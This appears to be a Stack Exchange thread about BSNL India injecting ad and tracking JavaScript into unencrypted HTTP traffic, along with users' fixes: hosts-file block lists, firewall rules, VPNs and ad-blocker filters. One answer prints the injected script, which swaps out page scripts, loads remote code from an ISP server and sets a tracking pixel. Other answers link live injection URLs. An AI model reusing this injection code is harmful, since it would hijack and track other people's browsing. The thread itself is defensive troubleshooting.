# My ISP (BSNL India) is injecting ads using Phozeca which spoils websites and makes them unresponsive, can anything be done?

Tags: injection

I've been recently having a problem where my ISP (BSNL India) has been injecting ads/weird Javascript Tracking codes onto my browser, making the website unusable and unresponsive.

I've written an article regarding this too: https://www.nonstoptrend.com/bsnl-is-injecting-adsscripts-onto-your-browser-using-phozeca-2017/

You can read that to understand what exactly is happening. You can refer to the article above to see what the injected code is doing.

I'm sure this is my ISP because the domain starts with "bsnl.phozeca.com" and uses the port "3000".

Points to note:-

- Script injection works only on Non HTTPS sites, such as Steam Store and other Non HTTPS websites.
- The code being injected, uses the port 3000.
- Websites which malfunction normally work when CSP (Content Security Policy) is disabled in the browser.
- Websites which malfunction work properly on Tor Browser.
- I personally have investigated into this matter, and after reading through the code (Read my article to know what i'm talking about), and after reading the code, I called the "loadnewads()" function from the code, and once it's called, weird ads come up, such as fake Flash player ads and fake download buttons.

-Things I have tried to solve this problem.-

1. Checking hosts file and blocking the domain: Not working. The script is still being injected.
2. Scanning the PC for malware: Not working. I've scanned with over three antiviruses including Malwarebytes, still it doesn't detect anything.
3. Disabling CSP (Content Security Policy): Worked! However ads automatically start playing.
4. Changed DNS to Google's DNS: Not working.

Is there any way to solve this problem? Please help.
Thanks!

Comment: Use a VPN, or set up an AWS instance in another country and tunnel all your traffic through it. #1, 2 and 4 wouldn't do anything because they're modifying your traffic in-flight (hence why HTTPS is unaffected.) If you hide your traffic in encrypted tunnels, they can't mess with it without breaking your connection.

Comment: Using a VPN will effect my social media profiles. They'll end up getting locked because of usage from an unknown IP address.

Also, i cannot register on a new forum/website with a VPN because the IP must have been used previously for registering.

Comment: What about using NoScript or some other script blocking plugin that prevents third-party scripts from executing?

Comment: Thanks for the suggestion, i will try it and let you know if it worked.
Although the thing is that the code injected by my ISP doesn't get executed because the CSP is enabled, it still just comes there out of nowhere.

Comment: Do you have any idea what port 3000 is being used for? I've never heard of it before.

Comment: They'll always be able to inject code into your unencrypted traffic. If you won't encrypt it, and you can't change ISPs, the best you can do is try to stop it from executing-- so a NoScript + Adblock plugin combo is the best you can hope for. Port 3000 is probably just the remote socket that returns ads when the injected script calls home.

Comment: A curl query shows that they are using the express webserver; which runs by default on port 3000 - https://expressjs.com/en/starter/hello-world.html

Comment: How come adding this to your host file doesn't work?  Are you using a proxy?

Comment: i would just inject an interception script into the page before they do using tampermonkey. you can then try to fight their core, censor the DOM after their code runs, or try to break a variable their code uses to stop it from running. also, firefox lets you manually ban scripts by source domain.

Comment: What kind of deal do you have with your ISP? Do they provide free internet in exchange for showing you ads?

Comment: I have the exact same issue and I've filed a complaint with BSNL. Could you give me few examples of HTTP websites where this happens, so that I can prove it to them? One website I know is regexr.com. I need more sites to show that it's not restricted only to regexr.com? The steam store is working fine for me, without any scripts from bsnl.phozeca.com

Comment: They are using some sort of intervals actually . I was having issues with http://kccl.tv , http://videocond2h.com etc.

Comment: Guys BSNL IS NOT injecting ads. Please read this thread: https://np.reddit.com/r/IndiaSpeaks/comments/a9nsoz/bsnl_is_not_injecting_the_ads_into_our_http/
Or click on this image: https://vgy.me/u/HIkvh9 The ads are being injected by cdn.tinypass.com and they are making it look like BSNL's guilty.

Comment: Please include the relevant parts of the link in your answer. The details in that person's thread are not confirmed, and it only raises more questions. The conclusions also are not supported by the evidence provided.

Comment: Why is the conclusion that tinypass is doing this independently and not that BSNL uses tinypass? I think more investigation needs to be done before conclusions can be made.

Comment: Please follow @schroeder's suggestions, but also think about the question. Your post doesn't answer the question, which is about what can be done. So I'll delete for now.

Comment: Steam Store is non-HTTPS?!

Comment: Need to ask bsnl to add number/user-id to DND. Have updated details in my answer.

Answer (score 6):

I had similar issues. I have a simple trick but it is temporary, but it is working for me and stopped BSNL ISP from tracking and pushing malware AD popup. I added a host entry in my computer for bsnl.phozeca.com and pointed it to localhost.

Comment: The succinct point of your answer Preetham is a "blacklist" hosts file. Good answer and a very good solution to this sort of problem. It may or may not be temporary, it depends on the attacker and their persistence. Further reading here: http://someonewhocares.org/hosts/ and https://isc.sans.edu/forums/diary/Host+file+black+lists/6469/

Comment: How did you manage to do it through your hosts file? I've tried doing the same, but it doesn't help.

Can you please show me your hosts file so I can see how exactly you've done it?

Thanks!

Comment: I use macbook, so the hosts file will be /etc/hosts. It didn't work for me too until I cleared DNS cache. I used below command

dscacheutil -flushcache

I think for windows it would be ipconfig /flushdns

Comment: Hey, thanks for the reply. Although I added the entry to the hosts file and flushed the DNS, it didn't work.

Somehow miraclly today when I tried to access the Steam Store, the Ads stopped coming!

The script stopped damaging the websites.

Comment: I am also facing the same issue after switching to connect ISP provider and I just fixed this by your suggestion to block it via host entry : 
#Block adware from connect #####
127.0.0.1 c.phozeca.com

Comment: Thank you. I could stop this malware popup in desktop. I couldn't solve this when I use in mobile through Wifi. Any suggestions?

Comment: I'm recently seeing a clone of stackoverflow website. Here is example:
http://stackoverflow.com.mevn.net/questions/45400733/how-to-create-new-c-sharp-project-working-in-unity
https://stackoverflow.com/questions/45400733/how-to-create-new-c-sharp-project-working-in-unity

Make sure u guys add this in to your blacklist. This is also a malware site.

Comment: @PreethamHegde Hi! Try adding a block at the router/model level. See post below!

Answer (score 6):

It looks like the malware has evolved.

It now uses an IP and is injecting itself into js files of 'http' websites (used a proxy for analyzing).

For example in case of bbc.co.uk, when browser requested for the below url :

http://static.bbc.co.uk/id/0.37.24/modules/idcta/statusbar.js

> instead of the below script (original) :

```
define(["idcta/idCookie","idcta/id-config","idcta/apiUtils"],function(d,c,h){var b={};function e(j){try{this.id=null;this.element=null;this.ctaLink=null;this.ctaName=null;if(f(j)){this.id=j.id;this.element=document.getElementById(j.id);if(!j.blq){this.ctaLink=document.getElementById("idcta-link");this.ctaName=this.element.getElementsByTagName("span")[0]}else{this.ctaLink=document.getElementById(j["link-id"])?document.getElementById(j["link-id"]):this.element.getElementsByTagName("a")[0];this.ctaName=j["name-id"]?document.getElementById(j["name-id"]):this.element.getElementsByTagName("span")[1]}var i=this;if(j.publiclyCacheable===true){if(d.getInstance().hasCookie()){if(c.status_url&&i.ctaLink.href!==c.status_url){i.ctaLink.href=c.status_url}a(i,d.getInstance())}else{if(c.signin_url){i.ctaLink.href=c.signin_url}i.ctaName.innerHTML=c.translation_signedout}}}}catch(k){h.logCaughtError(k)}}function a(m,k){try{var j=k.getNameFromCookie()||c.translation_signedin;var i=c.translation_signedin;if(j){i=g(j,14)}m.element.className=m.element.className+" idcta-signedin";m.ctaName.innerHTML=i}catch(l){h.logCaughtError(l)}}function g(j,i){if(j.length>i){return j.substring(0,i-1)+"…"}return j}function f(i){if(!document.getElementById(i.id)){return false}if(!i.blq&&!document.getElementById("idcta-link")){return false}if(i.blq&&!document.getElementById(i["link-id"])){return false}return true}b.Statusbar=e;b.updateForAuthorisedState=a;return b});
```

> the malware (isp-end?) injected the below js malacious script :

```
!function(){var a="/id/0.37.24/modules/idcta/statusbar.js",r=null,e=document.getElementsByTagName("script"),i=e.length,n=null,t=Date.now(),s=null,o=0;for("/"===a.substring(0,1)&&(a=a.substring(1)),o=0;o<i;o+=1)
if(void 0!==e[o].src&&null!==e[o].src&&e[o].src.indexOf(a)>-1){n=o,r=e[o];break}
void 0!==r&&null!==r||(r=document.getElementsByTagName("script")[0]),s=r.src.indexOf("?")>-1?r.src+"&cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag":r.src+"?cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";try{if(void 0===window.sarazasarazaNoti||null===window.sarazasarazaNoti||window.sarazasarazaNoti===Array&&window.sarazasarazaNoti.indexOf(r.src)<0){void 0!==window.sarazasarazaNoti&&null!==window.sarazasarazaNoti||(window.sarazasarazaNoti=new Array),window.sarazasarazaNoti.push(r.src);var c=r.parentNode,d=r;if(r.async||r.defer||null!==n&&n!==e.length-1){var w=document.createElement("script");w.src=s,c.replaceChild(w,d)}else document.write("<script type='text/javascript' src="+s+"><\/script>"),c.removeChild(d)}
var a1="117.254.84.212";var a2="3000";if(window===window.top&&(void 0===window.sarazasaraza||null===window.sarazasaraza||!window.sarazasaraza)){window.sarazasaraza=!0;var l=a1+":"+a2+"/getjs?nadipdata="+JSON.stringify("%7B%22url%22:%22%2Fid%2F0.37.24%2Fmodules%2Fidcta%2Fstatusbar.js%22%2C%22referer%22:%22http:%2F%2Fwww.bbc.com%2F%22%2C%22host%22:%22static.bbc.co.uk%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D")+"&screenheight="+screen.height+"&screenwidth="+screen.width+"&tm="+(new Date).getTime()+"&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0";!function(a,r,e,i,n,t,s){t=r.createElement(e),s=r.getElementsByTagName(e)[0],t.async=!0,t.src=i,s.parentNode.insertBefore(t,s)}(window,document,"script","//"+l)}
var imgtag=document.createElement('img');imgtag.height='1';imgtag.width='1';imgtag.style='border-style:none;';imgtag.alt='';imgtag.src='//'+a1+":"+a2+"/pixel/1x1.png"}catch(a){}}()
```

The fix that worked was to add a rule in the firewall so as to block port 3000 across bsnl's range 
: 117.192.0.0 117.255.255.255 (based on ultra-dns's information).

Did this both at system level as well as at the asdl-router level (since mobile devices using the network are impacted as well).

Hopefully this will minimize conflicts with other applications that use port 3000.

For Windows, video on blocking port can be found here :
https://www.youtube.com/watch?v=KA8BIshUcXw

Update 17 Nov 2019 - Getting the following image ([image: India-Inclusion-Summit-2019]) occasionally on http links upon launching browser after a period of in-activity.

**Update 28 Nov 2018** : 
Happy (and relieved) to convey that the issue has been resolved after registering  grievance on 'https://pgportal.gov.in' and subsequently BSNL BB-NOC team contacted and added user-id (corresponding to the service) to DND (may take a day or two for the change to reflect). The grievance on portal itself was about a month old at the time of them responding - although its possible they have tried to contact but had not been able to reach.

Note : Registering a standard line connectivity complaint did not work. BSNL team  closed the ticket saying the internet was working (although did indicate that the advertisements were by design).

Comment: As of 17Nov2019 - Getting [this image](https://meta.stackoverflow.com/4cebba4b-a1d7-4a17-8ed2-801f6924b29d) on http links on launching browser after a period of in-activity.

Answer (score 2):

First try to get along with your ISP to stop doing it(if it's applicable)

As you mentioned, HTTPS cannot be compromised which should be, so try to use HTTPS where possible.

About your next attempts

> 1) Checking hosts file and blocking the domain: Not working. The
>   script is still being injected.

Must work, if it doesn't so you are doing it wrong. Another way is blocking the same thing with your modem or router domain/ip block(or firewall)

If your ISP is smart enough, it should host the scripts with vary domain names, so blocking all of them will be hard for you.

> 2) Scanning the PC for malware

Won't work of course

> 3) Disabling CSP (Content Security Policy)

Have no clue what is this, but since HTTP comes with zero security, this CSP could be fooled, or/and cannot say if a content is not permitted(what logic?)

> 4) Changed DNS to Google's DNS

Won't work of course, the issue you have is about the post dns. even if your ISP override the result by domain resolve, it's still simple to place the add in http.

**100% working solutions**
Use a VPN, or a sTunnel which binds to services like squid in back. This could not work if your ISP finds your connection to the target ip(either VPN or sTunnel) as its anti-ad policy.

**50% working solutions**
Block all of the contents by your browser adblock(or anything else) plugin.

Comment: Old answer, but: "Must work, if it doesn't so you are doing it wrong." if **FALSE**. HOSTS files, and other domain-name-based blocks, are trivial to circumvent for HTTP by using raw IP address (v4 or v6, if the latter is supported by the network) rather than domain names. Doing so skips the entire domain name resolution step, which is where the HOSTS file (and DNS resolver cache, DNS query, etc.) comes in. You have to either block the port or the IP range (or ideally block the port across the IP range, though then they might switch ports).

Answer (score 2):

As Preetam suggested - adding more details.

1. i downloaded the hosts file from http://winhelp2002.mvps.org/hosts.zip
   Replaced it in this location C:\Windows\System32\drivers\etc
2. If you do not know how to replace the hosts file then you can follow this instruction 
   http://winhelp2002.mvps.org/hostswin8.htm
3. To get rid of the popup from engine.spotscenered.info/link.engine?guid=
   I added the following entries within the host file:

   0.0.0.0 www.onclickmax.com
   0.0.0.0 bsnl.phozeca.com
   0.0.0.0 *.onclickmax.com
   0.0.0.0 phozeca.com
   0.0.0.0 c.phozeca.com

I do not see any popup ads... gone!

Comment: Now they seem to be using IP address directly without DNS names. So **blocking it through hosts file is not possible**. You can do it by setting up IP Security Policy on your local machine or domain. You can refer it over in this link https://davidsekar.com/misc/block-bsnl-ads-using-ipsec

Answer (score 1):

I have written this earlier on India Broadband Forum as well. You need to block 3 websites via URL Filter or hosts block:
mutualvehemence.com
bsnl.phozeca.com:3000 (or c.phozeca.com:3000)
decademical.com

WHOIS the 2nd website and you will realise that Bsnl itself is injecting these ads. Registered address of server says NS Cell, BSNL etc.. So the Head office of bsnl is responsible for this. (NS is probably network surveillance). More such websites will be released for JS Injection as 2nd website was not earlier used for injection

Simple solution:
Visit any http website and right click any where on page. Then click Inspect Element and click Sources tab and look at all the sources. One of these will have an obfuscated JS file (if not blocked) which is the reason for popup ads. Block that URL.

Answer (score 1):

The method of click-jacking works only from the BSNL BroadBand connection not from BSNL SIM data network. Even though the script loads, but doesn't move to other websites

BSNL servers have been corrupting or infecting with Malware / Virus day-by-day due to poor security

Recently `http://www.memo.tv` would redirect it into <s>`http://xalabazar.com`</s> changed to `http://preskalyn.com`

Found the script with url : [Be aware, before clicking this link](http://117.254.84.212:3000/getjs?nadipdata=%22%7B%22url%22:%22%2Fwpmemo%2Fwp-includes%2Fjs%2Fjquery%2Fjquery.js%3Fver%3D1.12.4-wp%22%2C%22referer%22:%22http:%2F%2Fwww.memo.tv%2Fworks%2F%22%2C%22host%22:%22www.memo.tv%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%2C%22nadipdomain%22:1%7D%22&screenheight=1080&screenwidth=1920&tm=1558777463790&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0)

Decoded URL:

```
http://117.254.84.212:3000/getjs?nadipdata="{"url":"/wpmemo/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp","referer":"http://www.memo.tv/works/","host":"www.memo.tv","categories":[0],"reputations":[1],"nadipdomain":1}"&screenheight=1080&screenwidth=1920&tm=1558777463790&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0
```

**Here the script is being injected to `/wpmemo/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp` you can find the getjs() routes via method loaded from the Node.js [getjs Link](https://pastebin.com/siGNvAg5) getting our IP Address from the BSNL SIM / any other ISP**

since it would leads all your browsing information to this IP `117.254.84.212`.

[image]

[image]
There was **naganoadigei.com** was registered explicitly to serve malware and redirect users to phishing sites.

Recently on February 2019, they had resolved the issue. But unfortunately the new type of 
ad based redirects found that was **humparsi.com** as of in the month February 2019 which was fixed on March 2019

---

Alternatively, you can block the outgoing request by your standalone system in DNS entry

Navigate to `%windir%\System32\drivers\etc` and edit the **hosts** file in elevated mode / with Admin authorization and add these lines to your **hosts** file

```
0.0.0.0 preskalyn.com
0.0.0.0 xalabazar.com
0.0.0.0 humparsi.com
0.0.0.0 naganoadigei.com
0.0.0.0 cobalten.com
0.0.0.0 rateus.co.in
0.0.0.0 go.oclasrv.com
0.0.0.0 onclickmax.com
0.0.0.0 bsnl.phozeca.com
0.0.0.0 phozeca.com
0.0.0.0 c.phozeca.com
```

The above sites are not secured with SSL

To Block specific IP address you do it by blocking outgoing bounds in the firewall

In order to cut down the impact or any unlikely adverse effects, you can block the JavaScript by installing Add-ons such as `NoScript` or `ScriptSafe` and [HTTPS Everywhere](https://www.eff.org/https-everywhere)

To find out which application uses the IP address with the port number assigned:

```
C:\Windows\system32>netstat -anob
```

Answer (score 1):

> This answer may be out of date as the script may be removed by BSNL.

**The script is collecting your IP Address and subscriber ID as well: Open this [link](http://117.254.84.212:3000/getjs?nadipdata=%7B%22url%22%3A%22%2F%22%2C%22referer%22%3A%22%22%2C%22host%22%3A%22h2020.myspecies.info%22%2C%22categories%22%3A%5B100%5D%2C%22reputations%22%3A%5B1%5D%2C%22nadipdomain%22%3A1%2C%22policyid%22%3A0%7D&screenheight=1120&screenwidth=1792&tm=1603925840327&lib=true&method2=true) and check your Subscriber ID and IP Address as well.**

Since BSNL did not comply with users' complaints on HTTP Ad Script Injection I have reported a local solution (with the help of [Adguard](https://adguard.com/?aid=31246))

> Reference: [Github](https://github.com/AdguardTeam/AdguardFilters/commit/2a05c66d13009c3fd6f6bae462504738ba2fe5df)

What this would do?

- Remove Click-jacking Ads on HTTP sites

Which devices would this work?

- All Browsers having [Adguard](https://adguard.com/?aid=31246)  Extension (or having uBlock Origin with Adguard Filter)
- [Adguard Android](https://download.adguard.com/d/31246/adguard.apk)
- [Adguard iOS](https://adguard.com/?aid=31246)
- [Adguard Mac](https://download.adguard.com/d/31246/AdGuardInstaller.dmg)
- [Adguard Windows](https://download.adguard.com/d/31246/adguardInstaller.exe)

What it would not do?

- It cannot stop BSNL from recording your visit to a particular HTTP website in a separate record.
- It cannot stop Redirect Scripts on FUP Expiry/Offer by Phozeca SDK (although it is currently disabled)

**Update: Newer Commit:** [GitHub Link](https://github.com/AdguardTeam/AdguardFilters/commit/d3a4e7072515699733e7ebe0cb9050db9e5538ec)

Answer (score 0):

The easiest solution might be to use the Opera browser and its built-in "VPN" service. That is not a full-blown VPN, but it will use a secure HTTPS connection to one of Opera's proxy servers. Even if Steam sends its pages insecurely to Opera, the delivery over the bsnl network will be secure.